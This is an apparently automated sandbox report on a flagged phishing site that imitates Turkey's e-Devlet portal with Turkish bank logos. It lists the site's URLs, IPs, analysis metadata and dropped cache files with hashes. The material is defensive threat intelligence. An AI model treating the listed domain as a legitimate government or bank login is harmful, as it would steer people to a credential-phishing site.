https://ogs.com.tc/assets/images/banks/ing.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/hsbc.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/isbank.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/edkkds.svg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/odea.jpg100%Avira URL Cloudphishing
https://ogs.com.tc/assets/css/style.css100%Avira URL Cloudphishing
https://ogs.com.tc/assets/images/banks/ptt.jpg100%Avira URL Cloudphishing

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
www.google.com
142.250.185.228
truefalseunknown
ogs.com.tc
185.216.70.93
truefalseunknown
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://ogs.com.tc/assets/images/banks/akbank.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/teb.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/albaraka.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/alternatif.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/turkiyefinans.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/fiba.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/halk.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/js/script.jsfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/garanti.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/favicon-196x196.pngfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/kuveyt.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/deniz.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/vakif.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/finans.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/sekerbank.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/ykb.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/1.pngfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/ziraat.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/anadolu.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/ing.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/hsbc.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/isbank.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/edkkds.svgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/assets/images/banks/odea.jpgfalse
  • Avira URL Cloud: phishing
unknown
https://ogs.com.tc/true
    		unknown
    https://ogs.com.tc/assets/css/style.cssfalse
    • Avira URL Cloud: phishing
    		unknown
    https://ogs.com.tc/assets/images/banks/ptt.jpgfalse
    • Avira URL Cloud: phishing
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    142.250.185.228
    		www.google.comUnited States
    		15169GOOGLEUSfalse
    239.255.255.250
    		unknownReserved
    		unknownunknownfalse
    185.216.70.93
    		ogs.com.tcGermany
    		43659CLOUDCOMPUTINGDEfalse

    Private

    IP
    192.168.2.6
    192.168.2.5

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1447546
    Start date and time:2024-05-26 00:17:18 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 13s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:browseurl.jbs
    Sample URL:https://ogs.com.tc/
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal72.win@16/92@6/5
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.186.110, 142.251.168.84, 34.104.35.123, 142.250.186.138, 142.250.186.35, 20.12.23.50, 173.222.108.210, 173.222.108.226, 192.229.221.95, 20.166.126.56, 20.242.39.171, 20.114.59.183, 142.250.186.131, 199.232.214.172
    • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, fonts.gstatic.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    LLM Input / Output

    InputOutput
    URL: https://ogs.com.tc/ Model: Perplexity: mixtral-8x7b-instruct
    {
"loginform": false,
"reasons": [
"No form fields for username or password are present in the text.",
"No submit button for the form is present in the text.",
"The text appears to be a list of banks and financial institutions, not a login form."
]
}
    e-Devlet KaplS1 Kimlik Dogrulama Sistemi Giris Yaplluak Adres www.turkiye.gov.tr Giris Yapllacak uygulama e-Devlet Kapsi Alternatif alBaraka O AKBANK Fibabanka DenizBank Anadolubank QNB EHALKBANK E.BVA ING TRKiYE BANKASI odeabank Pttbank KuuEYTTRK Sekerbank TEB Trkiye Finans YamKredi Vak1fBank ZiraatBank @ 2024 Ankara - Tm Haklarl Saklldlr Gizlilikve Gvenlik HIZII Czrn Merkezi

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:18:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2677
    Entropy (8bit):3.968493900316908
    Encrypted:false
    SSDEEP:48:8gwd5jTBFVfHOidAKZdA19ehwiZUklqehsJy+3:8nj7VsBJy
    MD5:2BFE3A60BD05B211247EDB202DFBD6E7
    SHA1:D22A76C30170B0336D8C29E6D92BE6B1DFEA8852
    SHA-256:B50478220CC3C3683CCDB54D29897F3C543F30E2F0C8C4CFF0E3522EFCCD1FEF
    SHA-512:0F47710481DB0925E486B7C477108C58CBD42DCC0D723DE9BD73D033C79848EE832BF04670D5971B4A2C51DE74E6B1DC69AFCB6A746D836BE9837DFD0ABF6CCF
    Malicious:false
    Reputation:low
    Preview:L..................F.@.. ...$+.,....X<.j...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XA.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XA.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XA.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XA............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:18:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2679
    Entropy (8bit):3.9836049232378894
    Encrypted:false
    SSDEEP:48:8+wd5jTBFVfHOidAKZdA1weh/iZUkAQkqehxJy+2:8tj7Ve9Q+Jy
    MD5:4338C08E04782B8C277A4E3124445951
    SHA1:A5DFA7627E8B4F0F2FCF9EB6F429E8C9CC4D8E10
    SHA-256:FB4C6042A19FBEC5A643F8B6217B1F329018F63464646DA0D2DE855E0D3DE704
    SHA-512:4F1C527B5BCCC585233429E185714E189A8ABD8CB69D21C76DBA254C7C7BE68CEBF521B6118724CBCD1DBAA20C17F6E4D1B5E91A78B4A03DA827CDE6A6651AFF
    Malicious:false
    Reputation:low
    Preview:L..................F.@.. ...$+.,...."..j...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XA.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XA.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XA.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XA............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2693
    Entropy (8bit):3.99671133599415
    Encrypted:false
    SSDEEP:48:8xNwd5jTBFsHOidAKZdA14tseh7sFiZUkmgqeh7srJy+BX:8xQj7PndJy
    MD5:59ECD6351667EE130E7B1185E37D78E5
    SHA1:5E14ADC85C64AD5FE07529344AAA6D5D69F5FC32
    SHA-256:4D7F2D215B5254F34943B208003DFDD9B10F89FFE95929814AA207C8E32FB433
    SHA-512:57944CDDD768D8E67E8862A418A5552B1C58B99671377300CF527E4E00E9AF3279D7632A74047D84F99135639BA08C54E841307E25158CA19B147E064C80FE39
    Malicious:false
    Reputation:low
    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XA.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XA.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XA.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XA............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:18:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2681
    Entropy (8bit):3.9852362416848415
    Encrypted:false
    SSDEEP:48:83wd5jTBFVfHOidAKZdA1vehDiZUkwqeh1Jy+R:8ij7VFjJy
    MD5:0E8F5EEE38B3E38AA1185549A8D4CE53
    SHA1:A62428098FABF76A9CC5279AE5ABCF4C448BC430
    SHA-256:2F48A54EB771689E14B6A9CF1CDA0BEE621084B2A61ECC200B73B615A7CAC763
    SHA-512:1EA63E5BA68F4BE99DBF8BF98316C356AED0D1E85313C5608495BCE99E90155E2E26783B467AB2D3E2C001F3C207782EB99B6F9CC0D78FD460C02C3EE27186A2
    Malicious:false
    Reputation:low
    Preview:L..................F.@.. ...$+.,.......j...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XA.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XA.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XA.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XA............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:18:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2681
    Entropy (8bit):3.9714438412580155
    Encrypted:false
    SSDEEP:48:8ywd5jTBFVfHOidAKZdA1hehBiZUk1W1qehnJy+C:8hj7VV9HJy
    MD5:8AE35F44580062D1D94FF9C3FBC1277D
    SHA1:AF1A8543CE17BE565FCD32F040691F14EA0AAFE8
    SHA-256:3882D13652340B1D1A96D9E14C25FF3ACD4A7C2E608BF43D5E3491449E037F20
    SHA-512:5BDF276F3030E87FB755C4D834159B9D8D971E946D81B7357E0BE0E2F45E050FC8E96703C19B40F24189A62DD89F3F483CAF088D51D37C3DD1878A44804A5ADE
    Malicious:false
    Reputation:low
    Preview:L..................F.@.. ...$+.,......j...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XA.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XA.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XA.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XA............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:18:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2683
    Entropy (8bit):3.9835166607270494
    Encrypted:false
    SSDEEP:48:8cwd5jTBFVfHOidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbdJy+yT+:8Tj7VpT/TbxWOvTbdJy7T
    MD5:6A93EA3B32330D03A573862D6A8A9F70
    SHA1:84BDEC29F719AB59C1522821845F75D4095A0F58
    SHA-256:FD90205D50DBED35DCCA4F7DC01667FCFE082C186EAAAA302947097CEB3006CD
    SHA-512:AFC5C69787FB775E4288F88478760C651499AA1110F1D796720520D9A527C1E7194C6194F2643403E666CCFF784863BA6BF885BC507371AEA446010C74197AD8
    Malicious:false
    Reputation:low
    Preview:L..................F.@.. ...$+.,.......j...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XA.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XA.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XA.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XA............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

    Chrome Cache Entry: 100

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:34:34], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):24936
    Entropy (8bit):7.391242814683689
    Encrypted:false
    SSDEEP:384:2bFO/iaEbFonMCUVzxO7NrKC85mpXXlxpJfVmqXkw9x8B:CFO/mFogxOJrFXxmeks8B
    MD5:2C60AD4276905C8109BB3981C24BB068
    SHA1:FB8C7C8F07557FF9776D9A95CB50A946A3D326BB
    SHA-256:497B1CE30CDF438891FC6F8DC9250206822ACC3E0F3D81D88599C6E6DC177795
    SHA-512:115BDDD2136E119C112D94560B83F24C84A49909F2172A40C7E75FE82F8A952B7B20ABFEC924BB4126EE3499B26865760AA33291302D236BE7D0B4A30B7CE003
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/odea.jpg
    Preview:.....ZExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:34:34........................................................................."...........*.(.....................2........... .......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$......j]..........k.B.r_m;.G.~.....z...%=.K....0:..O..e...m6_.k.h..c.m.j.k..z.U..Y.......__....

    Chrome Cache Entry: 101

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:27 19:59:58], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):22502
    Entropy (8bit):7.2894603929109865
    Encrypted:false
    SSDEEP:384:v9/ioaLnh1bF8ICY2MkvRkiMbF4/EMnTMY7LTat:v9/SLDGICY2rvkhObr7K
    MD5:AC0CD030D45D9E6E66C084BDE8E550BC
    SHA1:DDCD46644E2F43B14A8D399106F697631A138B2C
    SHA-256:42AC0A069FB6314753F1FDD80C94DAEEB7E784FBC34661CA692C7885390A86B9
    SHA-512:0926E006155988284696401B05F217E961474F125D560E654E6687B2D2CC48FB5306992143EB94D5836FE495FBA0EB07FAE1375652DAE028F240173C9B886C29
    Malicious:false
    Reputation:low
    Preview:.....SExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:27 19:59:58........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$....I.7.}.no...R.&.....3.J]$.IJI$.R.I$...I%)$.IO...T.I%)$.IJ\..*.[u..........2\....'.................*..E...........T.......-.....n...

    Chrome Cache Entry: 102

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:48:36], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):52012
    Entropy (8bit):7.792087654425522
    Encrypted:false
    SSDEEP:1536:pNaNX9QYIy7Gkkc6T7owWJw9gRcb/pYJxNZb1YZnvR:pIPZklUJAHb/pIxLYnp
    MD5:2C6418346997FDB03349D4F026BED400
    SHA1:EB6FC219BB66829771C3D153FD1C042AA31B368B
    SHA-256:FCC9FE739E09A1E8C65FA63D6802FE6D87AEB4BB73B3A41EAF90426A5F5D6CC0
    SHA-512:7728D1A6EF488CC401D45F5AD636FAAB3B2B4735A37C8480F75862350E10DE751187F1EB8E22E2138959B0B56E8B8BF2FB8D176BC086A50405D1C17E86E264C7
    Malicious:false
    Reputation:low
    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:48:36........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%0.R.-{H=...c.Hk..y..O......:_N.8N...[.f.R...X...a...O..+.J.?.a..Z..v5&.+cZ..`;...}.....$......@:.-.

    Chrome Cache Entry: 103

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 03:31:15], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):36954
    Entropy (8bit):7.6584790869372155
    Encrypted:false
    SSDEEP:768:zcoO/xcoGHVKZnU+ytlJjIWlBc86nXHgGbikavTDupeJMKK:zcoUcoGHw1/y3lLLCgGuhDTMJ
    MD5:55EAC6447192DC06174FFD6FC925B12C
    SHA1:EB34EA301401FDAAE5C50D52E2F11934738E98F5
    SHA-256:652F9B7EF8CD5A0C66CB112CE2B7EB8EA7F9332D13552C7E82E9C7E5F532E075
    SHA-512:54A0E0B2D0A1AC3F154DDBFFCBE366C0EA38A0BB6E2F84CC7EE30B2248DBDF0039C7C43B5D88DBA5C8F7A15EE8D986D25F74BDCE0B275B0C815EA5357DE825BD
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/fiba.jpg
    Preview:.....{Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 03:31:15........................................................................."...........*.(.....................2...........A.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)ef}`.....i...........[.........P....rG."..*...g.d....1M...N.N..s.$.9.e..pi<....=[1.......v2.6.....

    Chrome Cache Entry: 104

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:20:05], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):20736
    Entropy (8bit):7.207645802514661
    Encrypted:false
    SSDEEP:384:8UVb/iZjUVynSIFV8ZImDkUinAj5B3YWUp32XjW+ke4g:8UN/yUYHOjpiLWUp2XjWXg
    MD5:7E0925A6F6A401C7E8721B9836FC721F
    SHA1:9A0B48E0BD35CCC96C5391B2A30E8260098D7DF7
    SHA-256:CA3770BB64EF72AB2C7D2E1B28639FE9145970310EEDEF1657CB2B81BB3AA4C5
    SHA-512:09C0B4EE63589B8E5907DF1AF95DE667754532F491F786B6F7FC56E71204748D295FA48ABF262A6EA93E0EB8E6F05ED9666984F3330393E9AEAF2BBB9D8D893D
    Malicious:false
    Reputation:low
